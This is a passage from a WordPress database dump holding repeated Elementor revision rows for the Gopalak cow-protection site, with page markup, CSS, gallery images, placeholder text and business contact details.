.elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-12 12:49:06','2022-10-12 07:19:06','',1373,'https://gopalak.in/?p=1674',0,'revision','',0),(1675,1,'2022-10-12 12:49:06','2022-10-12 07:19:06','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-12 12:49:06','2022-10-12 07:19:06','',1373,'https://gopalak.in/?p=1675',0,'revision','',0),(1676,1,'2022-10-12 12:49:06','2022-10-12 07:19:06','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/logo1211-pw1l8axyrm0gi2xid7die7qxy8q0484aa3vz1kd0ie.png\" title=\"logo1211\" alt=\"logo1211\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-12 12:49:06','2022-10-12 07:19:06','',1373,'https://gopalak.in/?p=1676',0,'revision','',0),(1677,1,'2022-10-12 12:49:24','2022-10-12 07:19:24','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/logo1211-pw1l8axyrm0gi2xid7die7qxy8q0484aa3vz1kd0ie.png\" title=\"logo1211\" alt=\"logo1211\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-12 12:49:24','2022-10-12 07:19:24','',1373,'https://gopalak.in/?p=1677',0,'revision','',0),(1678,1,'2022-10-12 12:49:24','2022-10-12 07:19:24','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/logo1211-pw1l8axyrm0gi2xid7die7qxy8q0484aa3vz1kd0ie.png\" title=\"logo1211\" alt=\"logo1211\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" 